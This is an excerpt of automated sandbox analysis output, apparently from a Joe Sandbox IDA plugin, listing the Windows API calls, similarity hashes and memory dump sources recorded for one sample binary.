                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        • Opcode ID: 0474edcad2e7263e74516c4668d85345bf8a3da32e1c24316ff9ec23f4350cde
                                                                                                                        • Instruction ID: 2c3f50426a146e8d2bc7d00069235f1cea404695fe4d317a572107786424b804
                                                                                                                        • Opcode Fuzzy Hash: 0474edcad2e7263e74516c4668d85345bf8a3da32e1c24316ff9ec23f4350cde
                                                                                                                        • Instruction Fuzzy Hash: CA21AE7660421DAFDF14DFA8EC88CBB7BACFB0E3647008425BA18DB190D670DC469764
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00577842
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00577868
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0057786B
                                                                                                                        • SysAllocString.OLEAUT32 ref: 0057788C
                                                                                                                        • SysFreeString.OLEAUT32 ref: 00577895
                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 005778AF
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 005778BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3761583154-0
                                                                                                                        • Opcode ID: 42e4ee5e4a53b2733488e71b0fa3ed74475d04ce6a6b0237646e61b3497c7384
                                                                                                                        • Instruction ID: f04f6c16220ee9e93ed60939c5d961383f60e93ca6d7507fa7efb3135eb97a5d
                                                                                                                        • Opcode Fuzzy Hash: 42e4ee5e4a53b2733488e71b0fa3ed74475d04ce6a6b0237646e61b3497c7384
                                                                                                                        • Instruction Fuzzy Hash: A0215E31608219AF9F109BA8EC8CDBA7BECFB0D7607108125B919CB2A1DA74DC45DB65
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 005A5745
                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 005A579D
                                                                                                                        • _wcslen.LIBCMT ref: 005A57AF
                                                                                                                        • _wcslen.LIBCMT ref: 005A57BA
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 005A5816
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$_wcslen
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 763830540-2594219639
                                                                                                                        • Opcode ID: 56df450c6b26b099d33aa84421eb53186bcf6070b79e5e17adef38816cd82d0d
                                                                                                                        • Instruction ID: a4284232c3d5620534d9205d8c27ffa105127e8976dad31e93bdc0d7ede0f324
                                                                                                                        • Opcode Fuzzy Hash: 56df450c6b26b099d33aa84421eb53186bcf6070b79e5e17adef38816cd82d0d
                                                                                                                        • Instruction Fuzzy Hash: EF219331904618DADB208F64DC84EEE7FB8FF56320F108616F919EB180E7709985CF50
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 005804F2
                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0058052E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                        • String ID: nul
                                                                                                                        • API String ID: 1424370930-2873401336
• Opcode ID: 9163fb88ef69ad07d9bcbf2d9abde371c666f0f824b76126871922de985afc78
• Instruction ID: 9c7d3147b386a8114e02b5750a2c6f5bd12c813dd4f1ddfa126cea67167ce39d
• Opcode Fuzzy Hash: 9163fb88ef69ad07d9bcbf2d9abde371c666f0f824b76126871922de985afc78
• Instruction Fuzzy Hash: 90212C75600305AFDF60AF69D844A9A7FE4BF55724F204A19ECA1E62E0E7709948DF30
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 005805C6
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00580601
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: 469c7f529e6904b28756ad76fc6052d83c925d50faf29598e57948f3ca456fbc
• Instruction ID: e5c723a863d6c6fe7cf82ad9c551b56497688e16fb38169c5e756eea4dd4cab2
• Opcode Fuzzy Hash: 469c7f529e6904b28756ad76fc6052d83c925d50faf29598e57948f3ca456fbc
• Instruction Fuzzy Hash: AB2153755003059FDB60AF6A9C04A6A7FE4BF95720F205B19FCA1F72E0E7709969CB20
APIs
  • Part of subcall function 0051600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0051604C
  • Part of subcall function 0051600E: GetStockObject.GDI32(00000011), ref: 00516060
  • Part of subcall function 0051600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051606A
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 005A4112
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 005A411F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 005A412A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 005A4139
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 005A4145
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 12330973ad5a0c88b0ba4e5418dedbe544a927d7a456d07af947f54c5f628b4f
• Instruction ID: cb4d0cc8cb859647043195d014e59a02076571dedb0c9a3cb7cb2736a4013ce4
• Opcode Fuzzy Hash: 12330973ad5a0c88b0ba4e5418dedbe544a927d7a456d07af947f54c5f628b4f
• Instruction Fuzzy Hash: 8311B6B114011D7EEF118FA4CC85EEB7F5DFF59798F004111B618A6150C6729C61DBA4
APIs
  • Part of subcall function 0054D7A3: _free.LIBCMT ref: 0054D7CC
• _free.LIBCMT ref: 0054D82D
  • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
  • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
• _free.LIBCMT ref: 0054D838
• _free.LIBCMT ref: 0054D843
• _free.LIBCMT ref: 0054D897
• _free.LIBCMT ref: 0054D8A2
• _free.LIBCMT ref: 0054D8AD
• _free.LIBCMT ref: 0054D8B8
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
• Instruction ID: 417ec84ad38db8e74e8797b67926e58fb58d938e5b93832e5d11f6772c22c25f
• Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
• Instruction Fuzzy Hash: 1B114F71540B15ABE921BFB1CC4BFCB7FFCBF80704F800825B29DA6192DA79B5454660
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0057DA74
• LoadStringW.USER32(00000000), ref: 0057DA7B
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0057DA91
• LoadStringW.USER32(00000000), ref: 0057DA98
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0057DADC
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 0057DAB9
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
• Opcode ID: a3e50674b9392eec5578a4a4c1b0e4618bff2f7d6d3b45e7e0f1088cc93f5f71
• Instruction ID: 47a6e13620e782190c6b3c9374313eeff20332fda4825a87478aa119a98b56a1
• Opcode Fuzzy Hash: a3e50674b9392eec5578a4a4c1b0e4618bff2f7d6d3b45e7e0f1088cc93f5f71
• Instruction Fuzzy Hash: 560167F25002087FEB10D7A49D89EEB3BBCFB05301F404456B709E2041E6749E849F74
APIs
• InterlockedExchange.KERNEL32(0150E100,0150E100), ref: 0058097B
• EnterCriticalSection.KERNEL32(0150E0E0,00000000), ref: 0058098D
• TerminateThread.KERNEL32(00000007,000001F6), ref: 0058099B
• WaitForSingleObject.KERNEL32(00000007,000003E8), ref: 005809A9
• CloseHandle.KERNEL32(00000007), ref: 005809B8
• InterlockedExchange.KERNEL32(0150E100,000001F6), ref: 005809C8
• LeaveCriticalSection.KERNEL32(0150E0E0), ref: 005809CF
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 66175c213383191e2dcd659fa7aa0d598061f62dae75511bcaf649f8666eeec4
• Instruction ID: 0b7a1e224bf35d8a7f398d5ecd0e6b4f17d5088d86843c90ea5afdf2fb671657
• Opcode Fuzzy Hash: 66175c213383191e2dcd659fa7aa0d598061f62dae75511bcaf649f8666eeec4
• Instruction Fuzzy Hash: 57F03C32542A02BBD7415FA4EE8CBE6BF39FF12702F402025F202A18A0CB749469DF90
APIs
• __allrem.LIBCMT ref: 005400BA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005400D6
• __allrem.LIBCMT ref: 005400ED
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0054010B
• __allrem.LIBCMT ref: 00540122
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00540140
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
• Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
• Instruction ID: 8e23473207f57ba74eec83dc3c1ed4eca54db54e1dc9b9ce217cb2f8d7501e95
• Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
• Instruction Fuzzy Hash: B081F871A007069BE724AE39CC49BAB7FE9BF91328F24553AF951D76C1E770D9008B50
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005382D9,005382D9,?,?,?,0054644F,00000001,00000001,8BE85006), ref: 00546258
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0054644F,00000001,00000001,8BE85006,?,?,?), ref: 005462DE
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005463D8
• __freea.LIBCMT ref: 005463E5
  • Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
• __freea.LIBCMT ref: 005463EE
• __freea.LIBCMT ref: 00546413
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1414292761-0
                                                                                                                        • Opcode ID: aaab3657ba961c92df682226c7d01fa4ad07365ca3ccf535e5004d626b7b0eb4
                                                                                                                        • Instruction ID: 3fbf251d5f23bc9fb632ed8b9185025db5f5fafee3f0279a8ec4fe322b68717f
                                                                                                                        • Opcode Fuzzy Hash: aaab3657ba961c92df682226c7d01fa4ad07365ca3ccf535e5004d626b7b0eb4
                                                                                                                        • Instruction Fuzzy Hash: 5751DE72600256ABEB258E64DC85FEF7FA9FB86718F144A29F805D7190DB34DC40C6A1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                          • Part of subcall function 0059C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059B6AE,?,?), ref: 0059C9B5
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059C9F1
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA68
                                                                                                                          • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA9E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059BCCA
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059BD25
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0059BD6A
                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0059BD99
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0059BDF3
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0059BDFF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1120388591-0
                                                                                                                        • Opcode ID: 6c2580b85a7044a8d998fa5ceee2d114bdcd195f310ef46f5c4777f7896c1f4e
                                                                                                                        • Instruction ID: 2a9319274df48716c95288e4857821f2f203e22104ad1a171ec66022f79a0c6c
                                                                                                                        • Opcode Fuzzy Hash: 6c2580b85a7044a8d998fa5ceee2d114bdcd195f310ef46f5c4777f7896c1f4e
                                                                                                                        • Instruction Fuzzy Hash: 7B819D30108242AFE714DF24D995E6ABFE9FF85308F14895CF4594B2A2DB31ED45CB92
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(00000035), ref: 0056F7B9
                                                                                                                        • SysAllocString.OLEAUT32(00000001), ref: 0056F860
                                                                                                                        • VariantCopy.OLEAUT32(0056FA64,00000000), ref: 0056F889
                                                                                                                        • VariantClear.OLEAUT32(0056FA64), ref: 0056F8AD
                                                                                                                        • VariantCopy.OLEAUT32(0056FA64,00000000), ref: 0056F8B1
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0056F8BB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859894641-0
                                                                                                                        • Opcode ID: f03961c9676a9e6f348613401834b2e012481ccdec82e3e4352deb0761393dc8
                                                                                                                        • Instruction ID: bd3130b51eb21b362942704d5d13f4857b70a6ea9e97e5f70fdf2f0b091cf2e1
                                                                                                                        • Opcode Fuzzy Hash: f03961c9676a9e6f348613401834b2e012481ccdec82e3e4352deb0761393dc8
                                                                                                                        • Instruction Fuzzy Hash: AA51C831E00311BBDF20AB65F899B69BFA9FF95310F245866E905DF291DB708C40C766
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 005894E5
                                                                                                                        • _wcslen.LIBCMT ref: 00589506
                                                                                                                        • _wcslen.LIBCMT ref: 0058952D
                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00589585
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$FileName$OpenSave
                                                                                                                        • String ID: X
                                                                                                                        • API String ID: 83654149-3081909835
                                                                                                                        • Opcode ID: d5b02622984f735ee27529465bec506c9ae1dde9b374ffe17e7c23d07c672811
                                                                                                                        • Instruction ID: 11df7cf4072da922e408185763d5ec414add65fba783ca5403043dd5de1535b1
                                                                                                                        • Opcode Fuzzy Hash: d5b02622984f735ee27529465bec506c9ae1dde9b374ffe17e7c23d07c672811
                                                                                                                        • Instruction Fuzzy Hash: 51E1B5315043019FD714EF24C885AAEBBE4BFC5314F18896DF8999B2A2DB31ED45CB92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                                                                                        • BeginPaint.USER32(?,?,?), ref: 00529241
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 005292A5
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 005292C2
                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005292D3
                                                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00529321
                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 005671EA
                                                                                                                          • Part of subcall function 00529339: BeginPath.GDI32(00000000), ref: 00529357
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3050599898-0
                                                                                                                        • Opcode ID: 600491df042dabb187265537b9008f717c858d08481e37eaf564b22aa9983ebe
                                                                                                                        • Instruction ID: 027379cd50156cfc62f615645239b1b77b58bb2120b6ee5cc23bfec4bf28e176
                                                                                                                        • Opcode Fuzzy Hash: 600491df042dabb187265537b9008f717c858d08481e37eaf564b22aa9983ebe
                                                                                                                        • Instruction Fuzzy Hash: C1419F31104255AFD710DF24D884FBA7FA8FFAA724F140629F994CB2E2C7309849EB61
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0058080C
                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00580847
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00580863
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 005808DC
                                                                                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 005808F3
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00580921
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
